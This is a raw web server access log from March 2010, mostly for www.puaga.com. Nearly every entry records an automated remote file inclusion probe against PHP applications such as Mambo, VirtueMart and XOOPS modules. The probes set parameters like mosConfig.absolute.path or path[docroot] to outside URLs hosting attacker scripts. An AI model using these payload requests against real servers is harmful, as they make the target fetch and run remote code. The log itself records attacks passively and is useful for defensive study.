210.205.6.233 - - [03/Mar/2010:09:37:15 -0800] "GET /logs///setup.php?dir=http://www.smrkbor.cz/cz/katalog/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:09:37:44 -0800] "GET /setup.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:09:37:44 -0800] "GET /logs//setup.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:38:56 -0800] "GET /logs/access_100224.log%20%20//include.php?path[docroot]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:38:56 -0800] "GET /include.php?path[docroot]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:38:56 -0800] "GET /logs//include.php?path[docroot]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:09:39:34 -0800] "GET /logs/access_100218.log%20%20//setup.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:09:40:05 -0800] "GET /logs//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:09:40:05 -0800] "GET /logs/access_100219.log//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:09:40:05 -0800] "GET /download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:09:40:28 -0800] "GET /logs/access_100226.log///setup.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:09:40:33 -0800] "GET /download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:09:40:33 -0800] "GET /logs/access_100219.log%20%20//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:09:40:38 -0800] "GET /download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:09:40:54 -0800] "GET /logs/access_100222.log//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:09:41:02 -0800] "GET /logs/access_100222.log//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:09:42:46 -0800] "GET /logs/access_100205.log%20%20//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:09:42:52 -0800] "GET /logs/access_100205.log%20%20//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [03/Mar/2010:09:43:04 -0800] "GET /logs/access_100204.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:44:14 -0800] "GET /logs/access_100129.log%20%20//include.php?path[docroot]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:44:38 -0800] "GET /logs/access_100129.log%20%20//include.php?path[docroot]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:09:45:15 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:09:45:15 -0800] "GET /logs/access_100208.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:09:45:16 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:09:45:50 -0800] "GET /logs/access_100129.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:09:45:57 -0800] "GET /login.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:09:45:58 -0800] "GET /logs/access_100221.log%20%20//login.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:09:45:58 -0800] "GET /logs//login.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:09:46:32 -0800] "GET /logs/access_100206.log%20%20//login.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:09:47:16 -0800] "GET /logs//login.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:09:47:49 -0800] "GET /logs/access_100206.log%20%20//login.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.158.231.168 - - [03/Mar/2010:09:48:16 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://astro-bliznec.ru/forum//language/lang_english/cmdu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
202.158.231.168 - - [03/Mar/2010:09:48:16 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://astro-bliznec.ru/forum//language/lang_english/cmdu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:09:48:42 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
220.130.152.124 - - [03/Mar/2010:09:49:07 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://astro-bliznec.ru/forum//language/lang_english/cmdu.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.puaga.com"
220.130.152.124 - - [03/Mar/2010:09:49:07 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://astro-bliznec.ru/forum//language/lang_english/cmdu.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.puaga.com"
38.99.98.107 - - [03/Mar/2010:09:49:57 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.pixero.net"
38.99.98.107 - - [03/Mar/2010:09:50:13 -0800] "GET / HTTP/1.1" 200 401 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.pixero.net"
118.217.5.166 - - [03/Mar/2010:09:51:51 -0800] "GET /logs/access_100209.log//setup.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:51:57 -0800] "GET /logs//errors.php?error=http://www.difusion.com.mx/components/com_web/administrator/components/com_modules/models/ico.jpg/5.9v1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:51:58 -0800] "GET /errors.php?error=http://www.difusion.com.mx/components/com_web/administrator/components/com_modules/models/ico.jpg/5.9v1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:09:52:26 -0800] "GET /logs/access_100208.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:09:52:27 -0800] "GET /logs/access_100202.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:09:52:27 -0800] "GET /logs/access_100302.log HTTP/1.0" 200 1377884 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:52:41 -0800] "GET /logs//errors.php?error=http://www.difusion.com.mx/components/com_web/administrator/components/com_modules/models/ico.jpg/5.9v1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:52:41 -0800] "GET /errors.php?error=http://www.difusion.com.mx/components/com_web/administrator/components/com_modules/models/ico.jpg/5.9v1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:09:52:41 -0800] "GET /logs/access_100218.log//setup.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:52:44 -0800] "GET /logs/access_100219.log//errors.php?error=http://www.difusion.com.mx/components/com_web/administrator/components/com_modules/models/ico.jpg/5.9v1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.122.251.114 - - [03/Mar/2010:09:52:53 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:09:54:09 -0800] "GET /logs///modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:09:54:09 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:09:54:09 -0800] "GET /logs/access_100209.log%20%20///modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:54:47 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:54:47 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:54:48 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [03/Mar/2010:09:55:06 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [03/Mar/2010:09:55:06 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [03/Mar/2010:09:55:09 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
128.241.54.188 - - [03/Mar/2010:09:55:33 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
128.241.54.188 - - [03/Mar/2010:09:55:33 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
128.241.54.188 - - [03/Mar/2010:09:55:33 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [03/Mar/2010:09:56:03 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [03/Mar/2010:09:56:08 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:56:38 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:56:38 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:56:43 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:09:57:33 -0800] "GET /logs///?_zb_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:09:57:33 -0800] "GET //?_zb_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
128.241.54.188 - - [03/Mar/2010:09:57:37 -0800] "GET /logs/access_100206.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:58:04 -0800] "GET /logs//errors.php?error=http://www.difusion.com.mx/components/com_web/administrator/components/com_modules/models/ico.jpg/5.9v1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:58:05 -0800] "GET /logs/access_100219.log//errors.php?error=http://www.difusion.com.mx/components/com_web/administrator/components/com_modules/models/ico.jpg/5.9v1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:58:05 -0800] "GET /errors.php?error=http://www.difusion.com.mx/components/com_web/administrator/components/com_modules/models/ico.jpg/5.9v1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:58:50 -0800] "GET /logs/access_100225.log//errors.php?error=http://www.difusion.com.mx/components/com_web/administrator/components/com_modules/models/ico.jpg/5.9v1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:09:59:10 -0800] "GET //light//include/mail.inc.php?skin_board_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:09:59:11 -0800] "GET /logs///light//include/mail.inc.php?skin_board_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:09:59:11 -0800] "GET /logs/access_100226.log%20%20///light//include/mail.inc.php?skin_board_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:09:59:22 -0800] "GET //light//include/mail.inc.php?skin_board_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:09:59:22 -0800] "GET /logs/access_100226.log%20%20///light//include/mail.inc.php?skin_board_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:09:59:22 -0800] "GET /logs///light//include/mail.inc.php?skin_board_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:09:59:48 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:09:59:48 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:09:59:48 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:09:59:50 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:09:59:50 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:09:59:50 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:09:59:52 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:09:59:52 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:10:00:15 -0800] "GET /logs/access_100224.log//newspublish/include.php?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:10:00:15 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:10:00:15 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:10:00:16 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:10:00:16 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:10:00:16 -0800] "GET /logs/access_100224.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:10:00:45 -0800] "GET /logs/access_100224.log//newspublish/include.php?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:10:00:45 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:10:00:46 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:10:00:56 -0800] "GET /logs/access_100206.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:10:00:57 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:10:00:58 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:10:00:58 -0800] "GET /logs/access.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:10:01:00 -0800] "GET //light//include/mail.inc.php?skin_board_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:10:01:00 -0800] "GET /logs/access_100226.log%20%20///light//include/mail.inc.php?skin_board_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:10:01:00 -0800] "GET /logs/access.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:10:01:00 -0800] "GET /logs///light//include/mail.inc.php?skin_board_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:01:40 -0800] "GET /logs/access_100224.log//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:01:40 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:01:40 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:10:01:50 -0800] "GET /logs/?S=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:02:13 -0800] "GET /logs/access_100128.log%20%20/errors.php?error=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:10:02:52 -0800] "GET /logs/access_100303.log HTTP/1.0" 200 1409930 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:10:02:53 -0800] "GET /logs/access_100206.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:03:02 -0800] "GET /logs/access_100201.log%20%20/errors.php?error=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:03:03 -0800] "GET /errors.php?error=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:03:20 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:03:20 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:03:20 -0800] "GET /logs/access_100224.log//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:03:39 -0800] "GET /logs/access_100128.log%20%20/errors.php?error=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:10:04:54 -0800] "GET /logs/access_100128.log%20%20///?_zb_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
